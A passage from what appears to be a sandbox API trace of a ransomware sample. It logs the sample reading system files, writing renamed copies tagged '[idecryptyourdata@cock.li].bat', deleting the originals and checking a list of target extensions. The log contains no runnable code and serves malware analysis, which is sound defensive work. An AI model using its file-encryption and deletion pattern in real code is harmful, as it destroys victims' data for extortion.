lpNumberOfBytesRead=0x361fecc*=0x0, lpOverlapped=0x0) returned 1 [0183.828] WriteFile (in: hFile=0x3a0, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0xe2, lpOverlapped=0x0) returned 1 [0183.828] SetEndOfFile (hFile=0x3a0) returned 1 [0183.828] CloseHandle (hObject=0x3a0) returned 1 [0183.828] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.828] SetEndOfFile (hFile=0x39c) returned 1 [0183.831] CloseHandle (hObject=0x39c) returned 1 [0183.831] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\OSE.EXE.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0183.831] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\OSE.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\source engine\\ose.exe")) returned 1 [0183.831] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\OSE.EXE") returned 68 [0183.831] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\OSE.EXE") returned 68 [0183.831] lstrlenW (lpString=".doc") returned 4 [0183.831] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1 [0183.831] lstrlenW (lpString=".docx") returned 5 [0183.831] lstrcmpiW (lpString1=".docx", lpString2="E.EXE") returned -1 [0183.831] lstrlenW (lpString=".pdf") returned 4 [0183.831] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1 [0183.831] lstrlenW (lpString=".xls") returned 4 [0183.831] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1 [0183.831] lstrlenW (lpString=".xlsx") returned 5 [0183.832] lstrcmpiW (lpString1=".xlsx", lpString2="E.EXE") returned -1 [0183.832] lstrlenW (lpString=".ppt") returned 4 [0183.832] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1 [0183.832] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\OSE.EXE") returned 68 [0183.832] lstrlenW (lpString=".zip") returned 4 [0183.832] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1 [0183.832] lstrlenW (lpString=".rar") returned 4 [0183.832] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1 [0183.832] lstrlenW (lpString=".bz2") returned 4 [0183.832] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1 [0183.832] lstrlenW (lpString=".7z") returned 3 [0183.832] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1 [0183.832] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\OSE.EXE") returned 68 [0183.832] lstrlenW (lpString=".dbf") returned 4 [0183.832] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1 [0183.832] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\OSE.EXE") returned 68 [0183.832] lstrlenW (lpString=".1cd") returned 4 [0183.832] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1 [0183.832] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\OSE.EXE") returned 68 [0183.832] lstrlenW (lpString=".jpg") returned 4 [0183.832] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1 [0183.832] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\OSE.EXE") returned 68 [0183.832] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\OSE.EXE") returned 68 [0183.832] lstrlenW (lpString=".doc") returned 4 [0183.832] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1 [0183.832] lstrlenW (lpString=".docx") returned 5 [0183.832] lstrcmpiW (lpString1=".docx", lpString2="E.EXE") returned -1 [0183.832] lstrlenW (lpString=".pdf") returned 4 [0183.832] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1 [0183.833] lstrlenW (lpString=".xls") returned 4 [0183.833] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1 [0183.833] lstrlenW (lpString=".xlsx") returned 5 [0183.833] lstrcmpiW (lpString1=".xlsx", lpString2="E.EXE") returned -1 [0183.833] lstrlenW (lpString=".ppt") returned 4 [0183.833] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1 [0183.833] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\OSE.EXE") returned 68 [0183.833] lstrlenW (lpString=".zip") returned 4 [0183.833] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1 [0183.833] lstrlenW (lpString=".rar") returned 4 [0183.833] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1 [0183.833] lstrlenW (lpString=".bz2") returned 4 [0183.833] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1 [0183.833] lstrlenW (lpString=".7z") returned 3 [0183.833] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1 [0183.833] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\OSE.EXE") returned 68 [0183.833] lstrlenW (lpString=".dbf") returned 4 [0183.833] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1 [0183.833] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\OSE.EXE") returned 68 [0183.833] lstrlenW (lpString=".1cd") returned 4 [0183.833] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1 [0183.833] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\OSE.EXE") returned 68 [0183.833] lstrlenW (lpString=".jpg") returned 4 [0183.833] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1 [0183.833] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0183.834] lstrlenW (lpString="msdia100.dll") returned 12 [0183.834] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia100.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia100.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0183.834] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x361ff14 | out: lpFileSize=0x361ff14*=990032) returned 1 [0183.834] CloseHandle (hObject=0x39c) returned 1 [0183.834] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia100.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia100.dll")) returned 0x20 [0183.834] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia100.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia100.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0183.834] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia100.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia100.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0183.835] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.835] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.835] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia100.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia100.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0183.835] GetLastError () returned 0x0 [0183.835] ReadFile (in: hFile=0x39c, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0xf1b50, lpOverlapped=0x0) returned 1 [0184.346] WriteFile (in: hFile=0x3a0, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0xf1b60, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0xf1b60, lpOverlapped=0x0) returned 1 [0184.683] ReadFile (in: hFile=0x39c, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0x0, lpOverlapped=0x0) returned 1 [0184.683] WriteFile (in: hFile=0x3a0, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0xec, lpOverlapped=0x0) returned 1 [0184.683] SetEndOfFile (hFile=0x3a0) returned 1 [0184.683] CloseHandle (hObject=0x3a0) returned 1 [0184.683] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.683] SetEndOfFile (hFile=0x39c) returned 1 [0184.692] CloseHandle (hObject=0x39c) returned 1 [0184.693] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia100.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0184.693] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia100.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia100.dll")) returned 1 [0184.693] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia100.dll") returned 62 [0184.693] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia100.dll") returned 62 [0184.693] lstrlenW (lpString=".doc") returned 4 [0184.693] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0184.693] lstrlenW (lpString=".docx") returned 5 [0184.693] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0184.693] lstrlenW (lpString=".pdf") returned 4 [0184.693] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0184.693] lstrlenW (lpString=".xls") returned 4 [0184.693] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0184.693] lstrlenW (lpString=".xlsx") returned 5 [0184.694] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0184.694] lstrlenW (lpString=".ppt") returned 4 [0184.694] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0184.694] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia100.dll") returned 62 [0184.694] lstrlenW (lpString=".zip") returned 4 [0184.694] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0184.694] lstrlenW (lpString=".rar") returned 4 [0184.694] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0184.694] lstrlenW (lpString=".bz2") returned 4 [0184.694] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0184.694] lstrlenW (lpString=".7z") returned 3 [0184.694] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0184.694] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia100.dll") returned 62 [0184.694] lstrlenW (lpString=".dbf") returned 4 [0184.694] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0184.694] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia100.dll") returned 62 [0184.694] lstrlenW (lpString=".1cd") returned 4 [0184.694] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0184.694] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia100.dll") returned 62 [0184.694] lstrlenW (lpString=".jpg") returned 4 [0184.694] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0184.694] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia100.dll") returned 62 [0184.694] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia100.dll") returned 62 [0184.694] lstrlenW (lpString=".doc") returned 4 [0184.694] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0184.694] lstrlenW (lpString=".docx") returned 5 [0184.694] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0184.694] lstrlenW (lpString=".pdf") returned 4 [0184.695] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0184.695] lstrlenW (lpString=".xls") returned 4 [0184.695] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0184.695] lstrlenW (lpString=".xlsx") returned 5 [0184.695] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0184.695] lstrlenW (lpString=".ppt") returned 4 [0184.695] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0184.695] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia100.dll") returned 62 [0184.695] lstrlenW (lpString=".zip") returned 4 [0184.695] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0184.695] lstrlenW (lpString=".rar") returned 4 [0184.695] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0184.695] lstrlenW (lpString=".bz2") returned 4 [0184.695] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0184.695] lstrlenW (lpString=".7z") returned 3 [0184.695] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0184.695] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia100.dll") returned 62 [0184.695] lstrlenW (lpString=".dbf") returned 4 [0184.695] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0184.695] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia100.dll") returned 62 [0184.695] lstrlenW (lpString=".1cd") returned 4 [0184.695] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0184.695] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia100.dll") returned 62 [0184.695] lstrlenW (lpString=".jpg") returned 4 [0184.695] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0184.696] lstrcmpiW (lpString1=".tlb", lpString2=".bat") returned 1 [0184.696] lstrlenW (lpString="vstoee100.tlb") returned 13 [0184.696] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee100.tlb"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0184.696] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x361ff14 | out: lpFileSize=0x361ff14*=17048) returned 1 [0184.696] CloseHandle (hObject=0x39c) returned 1 [0184.696] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee100.tlb")) returned 0x20 [0184.696] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee100.tlb.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0184.697] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee100.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0184.697] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.697] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.697] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee100.tlb.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0184.697] GetLastError () returned 0x0 [0184.697] ReadFile (in: hFile=0x39c, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0x4298, lpOverlapped=0x0) returned 1 [0184.736] WriteFile (in: hFile=0x3a0, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0x42a0, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0x42a0, lpOverlapped=0x0) returned 1 [0184.738] ReadFile (in: hFile=0x39c, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0x0, lpOverlapped=0x0) returned 1 [0184.738] WriteFile (in: hFile=0x3a0, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0xee, lpOverlapped=0x0) returned 1 [0184.738] SetEndOfFile (hFile=0x3a0) returned 1 [0184.738] CloseHandle (hObject=0x3a0) returned 1 [0184.738] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.738] SetEndOfFile (hFile=0x39c) returned 1 [0184.739] CloseHandle (hObject=0x39c) returned 1 [0184.739] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0184.739] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee100.tlb")) returned 1 [0184.740] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb") returned 65 [0184.740] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb") returned 65 [0184.740] lstrlenW (lpString=".doc") returned 4 [0184.740] lstrcmpiW (lpString1=".doc", lpString2=".tlb") returned -1 [0184.740] lstrlenW (lpString=".docx") returned 5 [0184.740] lstrcmpiW (lpString1=".docx", lpString2="0.tlb") returned -1 [0184.740] lstrlenW (lpString=".pdf") returned 4 [0184.740] lstrcmpiW (lpString1=".pdf", lpString2=".tlb") returned -1 [0184.740] lstrlenW (lpString=".xls") returned 4 [0184.740] lstrcmpiW (lpString1=".xls", lpString2=".tlb") returned 1 [0184.740] lstrlenW (lpString=".xlsx") returned 5 [0184.740] lstrcmpiW (lpString1=".xlsx", lpString2="0.tlb") returned -1 [0184.740] lstrlenW (lpString=".ppt") returned 4 [0184.740] lstrcmpiW (lpString1=".ppt", lpString2=".tlb") returned -1 [0184.740] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb") returned 65 [0184.740] lstrlenW (lpString=".zip") returned 4 [0184.740] lstrcmpiW (lpString1=".zip", lpString2=".tlb") returned 1 [0184.740] lstrlenW (lpString=".rar") returned 4 [0184.740] lstrcmpiW (lpString1=".rar", lpString2=".tlb") returned -1 [0184.740] lstrlenW (lpString=".bz2") returned 4 [0184.740] lstrcmpiW (lpString1=".bz2", lpString2=".tlb") returned -1 [0184.740] lstrlenW (lpString=".7z") returned 3 [0184.740] lstrcmpiW (lpString1=".7z", lpString2="tlb") returned -1 [0184.740] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb") returned 65 [0184.740] lstrlenW (lpString=".dbf") returned 4 [0184.740] lstrcmpiW (lpString1=".dbf", lpString2=".tlb") returned -1 [0184.740] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb") returned 65 [0184.740] lstrlenW (lpString=".1cd") returned 4 [0184.740] lstrcmpiW (lpString1=".1cd", lpString2=".tlb") returned -1 [0184.740] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb") returned 65 [0184.741] lstrlenW (lpString=".jpg") returned 4 [0184.741] lstrcmpiW (lpString1=".jpg", lpString2=".tlb") returned -1 [0184.741] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb") returned 65 [0184.741] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb") returned 65 [0184.741] lstrlenW (lpString=".doc") returned 4 [0184.741] lstrcmpiW (lpString1=".doc", lpString2=".tlb") returned -1 [0184.741] lstrlenW (lpString=".docx") returned 5 [0184.741] lstrcmpiW (lpString1=".docx", lpString2="0.tlb") returned -1 [0184.741] lstrlenW (lpString=".pdf") returned 4 [0184.741] lstrcmpiW (lpString1=".pdf", lpString2=".tlb") returned -1 [0184.741] lstrlenW (lpString=".xls") returned 4 [0184.741] lstrcmpiW (lpString1=".xls", lpString2=".tlb") returned 1 [0184.741] lstrlenW (lpString=".xlsx") returned 5 [0184.741] lstrcmpiW (lpString1=".xlsx", lpString2="0.tlb") returned -1 [0184.741] lstrlenW (lpString=".ppt") returned 4 [0184.741] lstrcmpiW (lpString1=".ppt", lpString2=".tlb") returned -1 [0184.741] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb") returned 65 [0184.741] lstrlenW (lpString=".zip") returned 4 [0184.741] lstrcmpiW (lpString1=".zip", lpString2=".tlb") returned 1 [0184.741] lstrlenW (lpString=".rar") returned 4 [0184.741] lstrcmpiW (lpString1=".rar", lpString2=".tlb") returned -1 [0184.741] lstrlenW (lpString=".bz2") returned 4 [0184.741] lstrcmpiW (lpString1=".bz2", lpString2=".tlb") returned -1 [0184.741] lstrlenW (lpString=".7z") returned 3 [0184.741] lstrcmpiW (lpString1=".7z", lpString2="tlb") returned -1 [0184.741] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb") returned 65 [0184.741] lstrlenW (lpString=".dbf") returned 4 [0184.741] lstrcmpiW (lpString1=".dbf", lpString2=".tlb") returned -1 [0184.741] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb") returned 65 [0184.742] lstrlenW (lpString=".1cd") returned 4 [0184.742] lstrcmpiW (lpString1=".1cd", lpString2=".tlb") returned -1 [0184.742] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb") returned 65 [0184.742] lstrlenW (lpString=".jpg") returned 4 [0184.742] lstrcmpiW (lpString1=".jpg", lpString2=".tlb") returned -1 [0184.742] lstrcmpiW (lpString1=".mui", lpString2=".bat") returned 1 [0184.742] lstrlenW (lpString="msader15.dll.mui") returned 16 [0184.742] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui" (normalized: "c:\\program files\\common files\\system\\ado\\en-us\\msader15.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0184.745] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x361ff14 | out: lpFileSize=0x361ff14*=17920) returned 1 [0184.745] CloseHandle (hObject=0x39c) returned 1 [0184.745] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui" (normalized: "c:\\program files\\common files\\system\\ado\\en-us\\msader15.dll.mui")) returned 0x20 [0184.745] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\system\\ado\\en-us\\msader15.dll.mui.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0184.746] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui" (normalized: "c:\\program files\\common files\\system\\ado\\en-us\\msader15.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0184.746] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui") returned 63 [0184.746] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui") returned 63 [0184.746] lstrlenW (lpString=".doc") returned 4 [0184.746] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0184.746] lstrlenW (lpString=".docx") returned 5 [0184.746] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0184.746] lstrlenW (lpString=".pdf") returned 4 [0184.746] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0184.746] lstrlenW (lpString=".xls") returned 4 [0184.746] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0184.746] lstrlenW (lpString=".xlsx") returned 5 [0184.746] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0184.746] lstrlenW (lpString=".ppt") returned 4 [0184.746] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0184.746] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui") returned 63 [0184.746] lstrlenW (lpString=".zip") returned 4 [0184.746] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0184.746] lstrlenW (lpString=".rar") returned 4 [0184.746] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0184.746] lstrlenW (lpString=".bz2") returned 4 [0184.746] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0184.746] lstrlenW (lpString=".7z") returned 3 [0184.746] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0184.746] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui") returned 63 [0184.746] lstrlenW (lpString=".dbf") returned 4 [0184.746] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0184.747] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui") returned 63 [0184.747] lstrlenW (lpString=".1cd") returned 4 [0184.747] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0184.747] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui") returned 63 [0184.747] lstrlenW (lpString=".jpg") returned 4 [0184.747] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0184.747] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui") returned 63 [0184.747] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui") returned 63 [0184.747] lstrlenW (lpString=".doc") returned 4 [0184.747] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0184.747] lstrlenW (lpString=".docx") returned 5 [0184.747] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0184.747] lstrlenW (lpString=".pdf") returned 4 [0184.747] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0184.747] lstrlenW (lpString=".xls") returned 4 [0184.747] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0184.747] lstrlenW (lpString=".xlsx") returned 5 [0184.747] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0184.747] lstrlenW (lpString=".ppt") returned 4 [0184.747] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0184.747] 